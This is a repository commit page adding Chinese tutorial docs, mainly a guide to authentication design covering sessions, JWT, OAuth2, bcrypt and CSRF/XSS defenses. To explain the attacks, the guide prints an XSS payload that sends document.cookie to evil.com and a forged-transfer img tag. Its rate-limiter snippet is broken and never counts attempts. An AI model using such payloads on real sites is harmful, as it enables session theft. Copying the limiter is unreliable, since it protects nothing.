delorex/test-repo
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

feat: update docs and components, fix DLQ demo bug

Browse Source
This commit is contained in:
sanbuphy
2026-01-18 12:21:49 +08:00
parent 26ed39e1eb
commit e41063a1cd
159 changed files with 54236 additions and 2525 deletions
Download Patch File Download Diff File Expand all files Collapse all files
docs/zh-cn/appendix/ai-evolution.md
+18 -11
View File
@@ -21,14 +21,18 @@
这被称为**专家系统 (Expert Systems)**。
### 1.1 什么是"基于规则"
就像教小孩:
* 如果看到红灯,就停下。
* 如果下雨,就带伞
- 如果看到红灯,就停下
- 如果下雨,就带伞。
### 1.2 交互演示:规则 vs 学习
下方的演示展示了两种方式的区别。
* **左边 (规则)**:你必须显式地写代码 `if (size > 6)`。如果世界变了(比如苹果变小了),你的代码就失效了。
* **右边 (学习)**:你不需要写规则。你只需要给机器看一堆苹果和樱桃的数据,点击 **Train**,它自己会"悟"出一个分界线
- **左边 (规则)**:你必须显式地写代码 `if (size > 6)`。如果世界变了(比如苹果变小了),你的代码就失效了
- **右边 (学习)**:你不需要写规则。你只需要给机器看一堆苹果和樱桃的数据,点击 **Train**,它自己会"悟"出一个分界线。
<RuleBasedVsLearningDemo />
@@ -44,6 +48,7 @@
科学家开始模仿人脑的结构——**神经元**。
### 2.1 感知机 (Perceptron)
这是最简单的神经元模型。它接收多个输入,根据**权重 (Weight)** 加权求和,如果超过某个**阈值 (Bias)**,就激活。
$$ Output = \begin{cases} 1 & \text{if } \sum (w_i \cdot x_i) + b > 0 \\ 0 & \text{otherwise} \end{cases} $$
@@ -51,9 +56,11 @@ $$ Output = \begin{cases} 1 & \text{if } \sum (w_i \cdot x_i) + b > 0 \\ 0 & \te
听起来很复杂?动手试一下!
### 2.2 交互演示:玩转神经元
调整下方的 **Weights (权重)****Bias (偏置)**,看看能否控制神经元的输出。
* **Weights ($w$)**:代表输入的"重要性"。$w$ 越大,这个输入对结果影响越大。
* **Bias ($b$)**:代表神经元的"门槛"。$b$ 越小,神经元越容易兴奋(输出 1
- **Weights ($w$)**:代表输入的"重要性"。$w$ 越大,这个输入对结果影响越大
- **Bias ($b$)**:代表神经元的"门槛"。$b$ 越小,神经元越容易兴奋(输出 1)。
<PerceptronDemo />
@@ -74,10 +81,10 @@ $$ Output = \begin{cases} 1 & \text{if } \sum (w_i \cdot x_i) + b > 0 \\ 0 & \te
## 4. 总结
| 时代 | 核心理念 | 代表产物 | 局限 |
| :--- | :--- | :--- | :--- |
| **符号主义** | 智慧 = 规则 | 深蓝 (下棋), 医疗诊断系统 | 无法处理模糊、复杂的现实世界 |
| **连接主义** | 智慧 = 神经网络 | AlphaGo, 人脸识别 | 需要海量数据,是个"黑盒" |
| **生成式 AI** | 智慧 = 通用理解 | ChatGPT, Midjourney | 幻觉 (一本正经胡说八道) |
| 时代 | 核心理念 | 代表产物 | 局限 |
| :------------ | :-------------- | :------------------------ | :--------------------------- |
| **符号主义** | 智慧 = 规则 | 深蓝 (下棋), 医疗诊断系统 | 无法处理模糊、复杂的现实世界 |
| **连接主义** | 智慧 = 神经网络 | AlphaGo, 人脸识别 | 需要海量数据,是个"黑盒" |
| **生成式 AI** | 智慧 = 通用理解 | ChatGPT, Midjourney | 幻觉 (一本正经胡说八道) |
AI 的进化,就是从"人工设定规则"到"机器自动学习数据"的过程。
docs/zh-cn/appendix/auth-design.md
+919
View File
@@ -0,0 +1,919 @@
# 鉴权原理与实战:从 HTTP Basic 到 JWT (Interactive Guide to Authentication)
> 💡 **学习指南**:本章节带你深入理解后端系统的"门禁系统"——鉴权与授权。我们将从最基础的"你是谁"讲起,一步步掌握 Session、JWT、OAuth2.0 等现代鉴权方案。
<AuthEvolutionDemo />
## 0. 引言:系统的"门禁"
你登录微信后,为什么关掉再打开还是登录状态?
你访问 B 站,为什么知道你是大会员还是普通用户?
你用微信扫码登录第三方网站,为什么不用输入密码?
这背后都有一个核心系统:**鉴权与授权 (Authentication & Authorization)**。
如果把后端系统比作一栋大楼:
- **鉴权 (Authentication)**:确认"你是谁"(验证身份证/门禁卡)。
- **授权 (Authorization)**:确认"你能去哪里"(VIP 能进 VIP 休息室,普通用户不行)。
### 0.1 为什么要鉴权?
只有一个理由:**保护资源**。
- **隐私保护**:你的个人信息、聊天记录,只有你能看。
- **权限控制**:管理员可以删除用户,普通用户不行。
- **防止滥用**:防止恶意调用、刷接口。
<AuthBasicsDemo />
**关键点**:鉴权是第一道防线,所有敏感操作都必须先验证身份。
---
## 1. 基础概念:认证 vs 授权
### 1.1 认证 (Authentication):你是谁?
确认用户的身份。
- _例子_:输入用户名密码、刷指纹、人脸识别。
- _输出_:一个代表"你"的令牌(Token)。
- _英文简称_**AuthN**
### 1.2 授权 (Authorization):你能干什么?
确认用户有哪些权限。
- _例子_:管理员可以删除文章,普通用户只能点赞。
- _输出_:允许或拒绝访问。
- _英文简称_**AuthZ**
### 1.3 两者的关系
```
用户请求 → 认证 (你是谁?) → 授权 (你能做吗?) → 执行业务逻辑
↓ ↓
验证身份 检查权限
(Token 有效?) (有 delete 权限?)
```
<AuthNvsAuthZDemo />
**关键点**:先认证,再授权。只有确认了"你是谁",才能判断"你能干什么"。
---
## 2. 方案演进史
### 2.1 第一代:HTTP Basic Authentication
最古老的方案,直接把用户名密码放在 HTTP 头里。
```http
GET /api/user/profile HTTP/1.1
Host: example.com
Authorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=
(base64("username:password"))
```
- **优点**:简单,所有浏览器都支持。
- **缺点**
- 不安全(Base64 可解码,相当于明文)。
- 每次请求都要传密码(容易被截获)。
- 无法主动注销(除非关闭浏览器)。
**结论**:只适合内部测试工具,绝不用于生产环境。
### 2.2 第二代:Session + Cookie
Web 开发的经典方案。
**流程**
```
1. 用户登录 (POST /login)
→ 服务器验证用户名密码
→ 创建 Session(在服务器内存或 Redis
→ 返回 Set-Cookie: session_id=abc123
2. 后续请求
→ 浏览器自动带上 Cookie: session_id=abc123
→ 服务器根据 session_id 查找 Session
→ 找到就认为"你是你"
```
**代码示例**
```python
# 后端 (Python Flask)
from flask import session, request
@app.route("/login", methods=["POST"])
def login():
username = request.json["username"]
password = request.json["password"]
# 验证用户名密码
user = db.authenticate(username, password)
if user:
# 创建 Session
session["user_id"] = user.id
session["role"] = user.role
return {"status": "success"}
else:
return {"error": "用户名或密码错误"}, 401
@app.route("/api/admin/users")
def get_users():
# 检查 Session
if "user_id" not in session:
return {"error": "未登录"}, 401
# 检查权限
if session.get("role") != "admin":
return {"error": "权限不足"}, 403
# 执行业务逻辑
users = db.get_all_users()
return {"users": users}
```
<SessionCookieDemo />
**优点**
- 简单直观,易于理解。
- 服务端可以主动注销(删除 Session)。
**缺点**
- **服务器有状态**:需要存储 Session,多台服务器需要共享(如 Redis)。
- **跨域困难**Cookie 默认不能跨域(CORS 问题)。
- **CSRF 攻击**:恶意网站可以冒用你的 Cookie。
**结论**:适合传统 Web 应用(服务器端渲染),不适合移动端和现代 SPA。
### 2.3 第三代:Token (JWT)
现代 Web 的主流方案。
**核心思想**:不在服务端存储状态,把用户信息加密成 Token,放在客户端。
**JWT 结构**
```
JWT = Header.Payload.Signature
例子:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJhZG1pbiIsImV4cCI6MTYxNjIzOTAyMn0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
|--------------------------------| |-----------------------------------------------| |----------------------------|
Header Payload Signature
```
- **Header**:算法信息(如 `{"alg": "HS256", "typ": "JWT"}`)。
- **Payload**:用户信息(如 `{"user_id": 123, "role": "admin", "exp": 1616239022}`)。
- **Signature**:签名(防篡改)。
**流程**
```python
# 1. 用户登录
@app.route("/login", methods=["POST"])
def login():
username = request.json["username"]
password = request.json["password"]
user = db.authenticate(username, password)
if user:
# 生成 JWT
token = jwt.encode(
{
"user_id": user.id,
"role": user.role,
"exp": datetime.now() + timedelta(hours=24) # 24 小时过期
},
SECRET_KEY,
algorithm="HS256"
)
return {"token": token}
else:
return {"error": "用户名或密码错误"}, 401
# 2. 后续请求
@app.route("/api/admin/users")
def get_users():
# 从 Header 获取 Token
auth_header = request.headers.get("Authorization")
if not auth_header or not auth_header.startswith("Bearer "):
return {"error": "未提供 Token"}, 401
token = auth_header.split(" ")[1]
try:
# 验证并解析 Token
payload = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
except jwt.ExpiredSignatureError:
return {"error": "Token 已过期"}, 401
except jwt.InvalidTokenError:
return {"error": "Token 无效"}, 401
# 检查权限
if payload.get("role") != "admin":
return {"error": "权限不足"}, 403
# 执行业务逻辑
users = db.get_all_users()
return {"users": users}
```
<JWTWorkflowDemo />
**优点**
- **无状态**:服务端不存储 Session,易于横向扩展。
- **跨域友好**:放在 Header 里,不受 Cookie 跨域限制。
- **移动端友好**:原生 App 也能轻松使用。
- **信息丰富**:Payload 可以存用户信息、权限等。
**缺点**
- **无法主动注销**:Token 一旦签发,在过期前一直有效(除非用黑名单)。
- **Payload 可见**Base64 编码,不能存敏感信息(如密码)。
- **Token 过大**:每次请求都要带上,几百字节。
**结论**:现代 Web 和移动端的标准方案。
<SessionVsJWTDemo />
---
## 3. OAuth 2.0:第三方登录
你肯定见过这个按钮:"使用微信登录"、"使用 Google 登录"。
这就是 **OAuth 2.0**:一个**授权**框架(不是认证!)。
### 3.1 核心角色
| 角色 | 说明 | 例子 |
| :----------------------- | :----------------- | :----------------- |
| **Resource Owner** | 资源所有者(用户) | 你 |
| **Client** | 第三方应用 | 某个网站 |
| **Authorization Server** | 授权服务器 | 微信、Google |
| **Resource Server** | 资源服务器 | 微信的用户信息 API |
### 3.2 授权码模式 (Authorization Code Flow)
最安全的模式,适合有后端的服务器。
**流程**
```
1. 用户点击"使用微信登录"
→ 跳转到微信授权页面
https://open.weixin.qq.com/connect/qrconnect?
appid=APPID&
redirect_uri=https://yourapp.com/callback&
response_type=code&
scope=snsapi_login&
state=STATE
2. 用户扫码并同意授权
→ 微信重定向回你的网站
https://yourapp.com/callback?code=AUTHORIZATION_CODE&state=STATE
3. 你的后端用 code 换取 access_token
POST https://api.weixin.qq.com/sns/oauth2/access_token
{
"appid": "APPID",
"secret": "SECRET",
"code": "AUTHORIZATION_CODE",
"grant_type": "authorization_code"
}
→ 返回: { "access_token": "...", "openid": "..." }
4. 用 access_token 获取用户信息
GET https://api.weixin.qq.com/sns/userinfo?
access_token=ACCESS_TOKEN&
openid=OPENID
→ 返回: { "nickname": "张三", "headimgurl": "..." }
```
<OAuth2FlowDemo />
**代码示例**
```python
from flask import request, redirect
@app.route("/login/wechat")
def login_wechat():
# 1. 重定向到微信授权页面
auth_url = (
"https://open.weixin.qq.com/connect/qrconnect"
f"?appid={APPID}"
f"&redirect_uri={urlencode(REDIRECT_URI)}"
"&response_type=code"
"&scope=snsapi_login"
f"&state={generate_state()}"
)
return redirect(auth_url)
@app.route("/callback")
def wechat_callback():
# 2. 获取 code
code = request.args.get("code")
state = request.args.get("state")
# 验证 state(防 CSRF
if not verify_state(state):
return {"error": "Invalid state"}, 400
# 3. 用 code 换取 access_token
token_resp = requests.post(
"https://api.weixin.qq.com/sns/oauth2/access_token",
params={
"appid": APPID,
"secret": SECRET,
"code": code,
"grant_type": "authorization_code"
}
).json()
access_token = token_resp["access_token"]
openid = token_resp["openid"]
# 4. 获取用户信息
user_info = requests.get(
"https://api.weixin.qq.com/sns/userinfo",
params={
"access_token": access_token,
"openid": openid
}
).json()
# 5. 本地创建或更新用户
user = db.get_or_create_user(
openid=openid,
nickname=user_info["nickname"],
avatar=user_info["headimgurl"]
)
# 6. 生成本系统的 JWT
token = jwt.encode(
{"user_id": user.id, "exp": ...},
SECRET_KEY
)
return {"token": token}
```
**关键点**
- **code 只能用一次**:用完即失效,防止截获。
- **state 防 CSRF**:生成随机字符串,回调时验证,防止恶意网站伪造。
- **redirect_uri 必须匹配**:提前在微信开放平台注册,防止重定向攻击。
### 3.3 其他模式
| 模式 | 适用场景 | 安全性 |
| :---------------------------------- | :--------------------------- | :--------------- |
| **授权码模式** | 有后端的服务器 | ⭐⭐⭐⭐⭐ |
| **简化模式 (Implicit)** | 纯前端应用(SPA) | ⭐⭐⭐(不推荐) |
| **密码模式 (Resource Owner)** | 高度信任的应用(如官方 App) | ⭐⭐ |
| **客户端模式 (Client Credentials)** | 服务器间通信(无用户) | ⭐⭐⭐⭐ |
<OAuth2ModesDemo />
---
## 4. 实战:设计一个完整的鉴权系统
### 4.1 需求分析
- **多端支持**Web、iOS、Android。
- **第三方登录**:微信、Google。
- **权限控制**:普通用户、VIP、管理员。
- **安全**:防刷、防劫持、防重放。
### 4.2 架构设计
```
┌─────────────┐
│ 客户端 │
└──────┬──────┘
┌─────────────────────────────────┐
│ API Gateway │
│ - Rate Limiting (限流) │
│ - Token Validation (校验) │
└──────┬──────────────────────────┘
┌─────────────────────────────────┐
│ Auth Service (鉴权服务) │
│ - 注册、登录 │
│ - Token 签发与验证 │
│ - OAuth 2.0 集成 │
└──────┬──────────────────────────┘
┌─────────────────────────────────┐
│ Business Services │
│ - User Service │
│ - Order Service │
│ - Payment Service │
└─────────────────────────────────┘
```
### 4.3 数据库设计
```sql
-- 用户表
CREATE TABLE users (
id BIGINT PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(50) UNIQUE NOT NULL,
password_hash VARCHAR(255) NOT NULL, -- bcrypt 哈希
email VARCHAR(100) UNIQUE,
role ENUM('user', 'vip', 'admin') DEFAULT 'user',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
INDEX idx_username (username),
INDEX idx_email (email)
);
-- 第三方登录绑定表
CREATE TABLE user_auth_providers (
id BIGINT PRIMARY KEY AUTO_INCREMENT,
user_id BIGINT NOT NULL,
provider ENUM('wechat', 'google', 'github') NOT NULL,
provider_user_id VARCHAR(100) NOT NULL, -- 第三方的用户 ID
access_token TEXT, -- 加密存储
refresh_token TEXT,
expires_at TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
UNIQUE KEY uk_provider_provider_user_id (provider, provider_user_id),
FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE
);
-- Token 黑名单(用于主动注销)
CREATE TABLE token_blacklist (
id BIGINT PRIMARY KEY AUTO_INCREMENT,
token_jti VARCHAR(100) UNIQUE NOT NULL, -- JWT 的 JTI (唯一标识)
expired_at TIMESTAMP NOT NULL,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
INDEX idx_expired_at (expired_at)
);
```
<AuthDatabaseDemo />
### 4.4 代码实现
```python
# auth_service.py
import bcrypt
import jwt
from datetime import datetime, timedelta
SECRET_KEY = "your-secret-key-here" # 生产环境用环境变量
class AuthService:
def register(self, username: str, password: str, email: str = None):
# 1. 检查用户名是否存在
if db.get_user_by_username(username):
raise ValueError("用户名已存在")
# 2. 哈希密码(bcrypt
password_hash = bcrypt.hashpw(
password.encode('utf-8'),
bcrypt.gensalt(rounds=12)
).decode('utf-8')
# 3. 创建用户
user = db.create_user(
username=username,
password_hash=password_hash,
email=email
)
# 4. 签发 Token
return self._generate_tokens(user)
def login(self, username: str, password: str):
# 1. 查询用户
user = db.get_user_by_username(username)
if not user:
raise ValueError("用户名或密码错误")
# 2. 验证密码
if not bcrypt.checkpw(
password.encode('utf-8'),
user.password_hash.encode('utf-8')
):
raise ValueError("用户名或密码错误")
# 3. 签发 Token
return self._generate_tokens(user)
def _generate_tokens(self, user):
now = datetime.now()
# Access Token (短期,如 1 小时)
access_token = jwt.encode(
{
"user_id": user.id,
"role": user.role,
"type": "access",
"iat": now,
"exp": now + timedelta(hours=1),
"jti": str(uuid4()) # 唯一标识
},
SECRET_KEY,
algorithm="HS256"
)
# Refresh Token (长期,如 30 天)
refresh_token = jwt.encode(
{
"user_id": user.id,
"type": "refresh",
"iat": now,
"exp": now + timedelta(days=30),
"jti": str(uuid4())
},
SECRET_KEY,
algorithm="HS256"
)
return {
"access_token": access_token,
"refresh_token": refresh_token,
"token_type": "Bearer",
"expires_in": 3600 # access_token 过期时间(秒)
}
def refresh(self, refresh_token: str):
try:
payload = jwt.decode(refresh_token, SECRET_KEY, algorithms=["HS256"])
if payload.get("type") != "refresh":
raise ValueError("Invalid token type")
user = db.get_user_by_id(payload["user_id"])
return self._generate_tokens(user)
except jwt.ExpiredSignatureError:
raise ValueError("Refresh token 已过期")
except jwt.InvalidTokenError:
raise ValueError("Refresh token 无效")
def logout(self, token: str):
# 将 Token 加入黑名单
payload = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
db.add_to_blacklist(
jti=payload["jti"],
expired_at=datetime.fromtimestamp(payload["exp"])
)
def verify_token(self, token: str):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
# 检查是否在黑名单中
if db.is_token_blacklisted(payload["jti"]):
raise ValueError("Token 已注销")
return payload
except jwt.ExpiredSignatureError:
raise ValueError("Token 已过期")
except jwt.InvalidTokenError:
raise ValueError("Token 无效")
# API 装饰器
def require_auth(auth_service: AuthService):
def decorator(f):
def wrapper(*args, **kwargs):
# 从 Header 获取 Token
auth_header = request.headers.get("Authorization")
if not auth_header or not auth_header.startswith("Bearer "):
return {"error": "未提供 Token"}, 401
token = auth_header.split(" ")[1]
try:
# 验证 Token
payload = auth_service.verify_token(token)
# 将用户信息注入到请求上下文
request.user = payload
return f(*args, **kwargs)
except ValueError as e:
return {"error": str(e)}, 401
return wrapper
return decorator
def require_role(*roles):
def decorator(f):
def wrapper(*args, **kwargs):
if not hasattr(request, "user"):
return {"error": "未登录"}, 401
if request.user["role"] not in roles:
return {"error": "权限不足"}, 403
return f(*args, **kwargs)
return wrapper
return decorator
# 使用示例
@app.route("/api/admin/users", methods=["GET"])
@require_auth(auth_service)
@require_role("admin")
def get_users():
users = db.get_all_users()
return {"users": users}
@app.route("/api/user/profile", methods=["GET"])
@require_auth(auth_service)
def get_profile():
user = db.get_user_by_id(request.user["user_id"])
return {"user": user}
@app.route("/auth/refresh", methods=["POST"])
def refresh_token():
refresh_token = request.json.get("refresh_token")
try:
tokens = auth_service.refresh(refresh_token)
return tokens
except ValueError as e:
return {"error": str(e)}, 401
```
<CompleteAuthSystemDemo />
---
## 5. 安全最佳实践
### 5.1 密码存储
**❌ 错误做法**
```python
# 明文存储(绝对不行!)
db.save_password(username, password)
# MD5 / SHA1 哈希(不够安全,容易被彩虹表破解)
hash = md5(password)
db.save_password(username, hash)
```
**✅ 正确做法**
```python
# bcrypt(自适应哈希,慢哈希防暴力破解)
import bcrypt
password_hash = bcrypt.hashpw(
password.encode('utf-8'),
bcrypt.gensalt(rounds=12) # rounds 越大越安全,但也越慢
)
# 验证
if bcrypt.checkpw(password.encode('utf-8'), password_hash):
# 密码正确
```
**为什么 bcrypt**
- **慢**:故意设计得很慢(毫秒级),防暴力破解。
- **自适应**:可以调整 rounds,随硬件变强而增强。
- **加盐**:自带随机盐,防彩虹表。
<PasswordHashingDemo />
### 5.2 防暴力破解
- **限流**:同一个 IP / 用户名,1 分钟只能试 5 次。
- **验证码**:失败 3 次后要求输入验证码。
- **账号锁定**:失败 10 次后锁定账号 30 分钟。
```python
from functools import lru_cache
import time
@lru_cache(maxsize=10000)
def get_login_attempts(identifier: str) -> tuple:
"""返回 (尝试次数, 第一次尝试时间)"""
return (0, 0)
def check_rate_limit(identifier: str):
attempts, first_attempt = get_login_attempts(identifier)
now = time.time()
# 1 分钟内清零
if now - first_attempt > 60:
get_login_attempts.cache_clear()
return True
# 超过 5 次,拒绝
if attempts >= 5:
return False
return True
def record_login_attempt(identifier: str):
attempts, first_attempt = get_login_attempts(identifier)
if attempts == 0:
first_attempt = time.time()
get_login_attempts.cache_clear()
get_login_attempts(identifier) # 重新缓存
@app.route("/login", methods=["POST"])
def login():
username = request.json["username"]
# 检查限流
if not check_rate_limit(username):
return {"error": "尝试次数过多,请 1 分钟后再试"}, 429
password = request.json["password"]
# 验证密码
user = db.get_user_by_username(username)
if user and bcrypt.checkpw(password.encode(), user.password_hash.encode()):
# 登录成功,清空计数
get_login_attempts.cache_clear()
return {"token": generate_token(user)}
else:
# 登录失败,记录
record_login_attempt(username)
return {"error": "用户名或密码错误"}, 401
```
### 5.3 防 CSRF (Cross-Site Request Forgery)
**攻击场景**
你登录了银行网站 `bank.com`,然后访问了恶意网站 `evil.com``evil.com` 的页面里有一段代码:
```html
<img src="https://bank.com/api/transfer?to=attacker&amount=10000" />
```
你的浏览器会带上银行的 Cookie 发起这个请求(跨域请求),导致资金被转走。
**防御措施**
1. **CSRF Token**
- 服务端生成随机 Token,放在表单里。
- 提交时验证 Token 是否匹配。
```python
from flask import session
@app.route("/api/transfer", methods=["POST"])
def transfer():
# 验证 CSRF Token
token = request.headers.get("X-CSRF-Token")
if token != session.get("csrf_token"):
return {"error": "CSRF Token 无效"}, 403
# 执行转账
...
```
2. **SameSite Cookie**
- 设置 Cookie 的 `SameSite` 属性为 `Strict``Lax`
```python
# Flask 示例
app.config.update(
SESSION_COOKIE_SAMESITE='Lax', # 或 'Strict'
SESSION_COOKIE_SECURE=True # 只允许 HTTPS
)
```
3. **使用 JWT(不用 Cookie**
- JWT 存在 `localStorage`,不会自动带上,天然防 CSRF。
<CSRFDefenseDemo />
### 5.4 防 XSS (Cross-Site Scripting)
**攻击场景**
恶意用户在评论区输入:
```html
<script>
fetch('https://evil.com/steal?cookie=' + document.cookie)
</script>
```
如果网站直接渲染这段内容,其他用户的 Cookie 就会被盗走。
**防御措施**
1. **输出转义**
-`<` 转成 `&lt;``>` 转成 `&gt;`
```python
import html
def render_comment(comment):
# 转义 HTML
safe_comment = html.escape(comment)
return f"<div class='comment'>{safe_comment}</div>"
```
2. **Content Security Policy (CSP)**
- 设置 HTTP 头,限制脚本来源。
```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com
```
3. **HttpOnly Cookie**
- 设置 Cookie 的 `HttpOnly` 属性,JavaScript 无法读取。
```python
app.config.update(
SESSION_COOKIE_HTTPONLY=True
)
```
<XSSDefenseDemo />
---
## 6. 总结与学习路线
鉴权是后端系统的"基本功",掌握了它才能构建安全可靠的应用。
### 6.1 核心知识点
| 知识点 | 重要程度 | 难度 | 实战频率 |
| :-------------------- | :--------- | :--- | :------- |
| **Session + Cookie** | ⭐⭐⭐⭐ | 中 | 高 |
| **JWT** | ⭐⭐⭐⭐⭐ | 低 | 极高 |
| **OAuth 2.0** | ⭐⭐⭐⭐ | 高 | 高 |
| **密码哈希 (bcrypt)** | ⭐⭐⭐⭐⭐ | 低 | 极高 |
| **限流与防暴力破解** | ⭐⭐⭐⭐⭐ | 中 | 极高 |
| **CSRF 防御** | ⭐⭐⭐⭐ | 中 | 中 |
| **XSS 防御** | ⭐⭐⭐⭐ | 低 | 高 |
### 6.2 学习路线
1. **入门**1-2 天):
- 理解认证 vs 授权。
- 掌握 Session + Cookie 的原理。
- 实现一个简单的登录注册功能。
2. **进阶**1 周):
- 学习 JWT 的原理和实现。
- 实现基于 JWT 的鉴权系统。
- 掌握密码哈希(bcrypt)。
3. **实战**2-4 周):
- 集成 OAuth 2.0(微信、Google 登录)。
- 实现限流、防暴力破解。
- 防御 CSRF、XSS 等常见攻击。
4. **深入**(持续):
- 学习 RBAC(基于角色的访问控制)。
- 研究 SSO(单点登录)。
- 探索 Zero Trust Architecture(零信任架构)。
### 6.3 推荐资源
- **标准**
- RFC 6749 (OAuth 2.0)
- RFC 7519 (JWT)
- **文章**
- JWT.io: https://jwt.io/
- OAuth 2.0 简体中文版: https://oauth.net/2/
- **工具**
- jwt.io (JWT 在线调试)
- Postman (API 测试)
---
## 7. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :---------------- | :-------------------------- | :--------------------------------------------------------------------------------- |
| **AuthN** | Authentication | **认证**。确认"你是谁"(如输入密码验证身份)。 |
| **AuthZ** | Authorization | **授权**。确认"你能干什么"(如管理员才能删除)。 |
| **Session** | - | **会话**。服务端存储的用户状态信息。 |
| **Cookie** | - | **小甜饼**。浏览器存储的小段数据,每次请求都会自动带上。 |
| **JWT** | JSON Web Token | **JSON Web 令牌**。一种无状态的认证方案,包含 Header、Payload、Signature 三部分。 |
| **OAuth 2.0** | - | **开放授权**。第三方登录的标准化框架(如"用微信登录")。 |
| **SSO** | Single Sign-On | **单点登录**。登录一次,就可以访问多个应用(如 Google 账号登录所有 Google 服务)。 |
| **RBAC** | Role-Based Access Control | **基于角色的访问控制**。根据用户的角色(如 admin、user)决定权限。 |
| **CSRF** | Cross-Site Request Forgery | **跨站请求伪造**。攻击者诱导用户发送恶意请求(如用你的 Cookie 发起转账)。 |
| **XSS** | Cross-Site Scripting | **跨站脚本攻击**。攻击者在网页注入恶意脚本(如盗取 Cookie)。 |
| **bcrypt** | - | **密码哈希算法**。一种慢哈希算法,专门用于密码存储,防暴力破解。 |
| **Access Token** | - | **访问令牌**。短期有效的令牌,用于访问 API。 |
| **Refresh Token** | - | **刷新令牌**。长期有效的令牌,用于获取新的 Access Token。 |
| **Scope** | - | **权限范围**。OAuth 2.0 中的概念,表示第三方应用请求的权限(如读取用户信息)。 |
| **PKCE** | Proof Key for Code Exchange | **授权码交换的证明密钥**。OAuth 2.0 的扩展,用于公共客户端(如 SPA)的安全增强。 |
docs/zh-cn/appendix/backend-evolution.md
+178 -30
View File
@@ -16,24 +16,48 @@
---
## 1. 简单粗暴:单体架构 (Monolith)
## 1. 原始时代:物理服务器 & CGI (1990s)
在互联网刚起步时,后端就是一台放在机房里的**物理服务器**。
你把 `index.html``script.pl` 通过 FTP 传上去,用户访问时服务器逐个执行脚本。
### 1.1 痛点:慢、贵、难扩展
- **慢**:每次改代码都要手动上传。
- **贵**:扩容只能买更大的机器。
- **难扩展**:一台机器顶住所有请求,坏了就全站宕机。
**关键点**:这一阶段的核心问题是**硬件扩展与部署效率**。
<CgiQueueDemo />
---
## 2. 简单粗暴:单体架构 (Monolith)
随着框架的出现(Rails / Django / Spring),大家把所有功能都塞进一个应用里:
登录、下单、支付、商品管理……都在一个进程里完成。
在 2010 年以前,绝大多数应用都是**单体**的。
就像一个小餐馆,洗菜、切菜、炒菜都在一个大厨房里完成。
* **优点**:开发简单,部署方便(把一个大包扔到服务器上就行)。
* **缺点**:牵一发而动全身。
- **优点**:开发简单,部署方便(把一个大包扔到服务器上就行)。
- **缺点**:牵一发而动全身。
### 2.1 "雪崩"效应
### 1.1 "雪崩"效应
想象一下,如果"切菜"的师傅不小心切到了手(代码出了 Bug),整个后厨都要停下来处理伤口,导致所有客人都吃不上饭。
这就是单体架构最大的风险:**隔离性差**。
### 1.2 交互演示:单体 vs 微服务
<MonolithReleaseRiskDemo />
### 2.2 交互演示:单体 vs 微服务
下方的演示展示了两种架构在面对故障时的不同表现。
* 点击 **"Simulate Crash"** 按钮,模拟订单模块 (Order Service) 崩溃。
* **左边 (单体)**:订单模块崩溃导致内存溢出,**整个系统**(包括用户、支付)全部瘫痪
* **右边 (微服务)**:订单模块挂了,但用户还能登录,还能查看历史账单。只有"下单"功能暂时不可用
- 点击 **"Simulate Crash"** 按钮,模拟订单模块 (Order Service) 崩溃
- **左边 (单体)**:订单模块崩溃导致内存溢出,**整个系统**(包括用户、支付)全部瘫痪
- **右边 (微服务)**:订单模块挂了,但用户还能登录,还能查看历史账单。只有"下单"功能暂时不可用。
<MonolithVsMicroserviceDemo />
@@ -41,49 +65,173 @@
---
## 2. 蚂蚁雄兵:微服务 (Microservices)
## 3. 蚂蚁雄兵:微服务 (Microservices)
为了解决单体的问题,我们把大厨房拆成了很多个小厨房(服务)。
* 专门负责用户的服务
* 专门负责订单的服务
* 专门负责支付的服务
### 2.1 容器化革命 (Docker)
- 专门负责用户的服务
- 专门负责订单的服务
- 专门负责支付的服务
### 3.1 容器化革命 (Docker)
怎么管理这么多小厨房?
Docker 就像是**集装箱**。它把每个小服务连同它的锅碗瓢盆(依赖库)一起打包。
无论运到哪里(哪台服务器),打开集装箱就能直接开工,不用再重新安装环境。
### 3.2 编排与治理:K8s / 服务网格
当集装箱数量到达成百上千,就需要一个"港口调度系统":
- **Kubernetes (K8s)**:负责把容器安排到合适的机器上(调度、扩缩容、滚动更新)。
- **Service Mesh**:负责服务之间的交通规则(熔断、限流、重试、可观测)。
**关键点**:微服务不是"拆开就好",真正的难点在于**治理和运维**。
<MicroserviceLatencyDemo />
---
## 3. 云端进化:无服务 (Serverless)
## 4. 云端进化:无服务 (Serverless)
微服务虽然好,但维护几十个小厨房还是很累。你需要担心:
* 厨房够不够大?(服务器扩容)
* 停电了怎么办?(高可用)
### 3.1 什么是 Serverless
- 厨房够不够大?(服务器扩容)
- 停电了怎么办?(高可用)
- 容器太多怎么管?(运维成本)
### 4.1 什么是 Serverless
Serverless 并不是"没有服务器",而是**"你不需要管理服务器"**。
就像你现在不想自己做饭,也不想开饭馆,而是直接叫**外卖**。
* 你只需要写代码(下单)。
* 云厂商(美团)负责准备机器、运行代码、自动扩容。
* **按次付费**:代码跑了 100 毫秒,就收 100 毫秒的钱。没人访问就不收钱。
### 3.2 适用场景
- 你只需要写代码(下单)。
- 云厂商(美团)负责准备机器、运行代码、自动扩容。
- **按次付费**:代码跑了 100 毫秒,就收 100 毫秒的钱。没人访问就不收钱。
### 4.2 适用场景
Serverless 特别适合:
* **潮汐流量**:比如外卖软件,中午流量大,半夜没人。Serverless 会自动在中午为你分配 1000 台机器,半夜缩减到 0 台。
* **事件驱动**:比如"用户上传图片后,自动压缩图片"
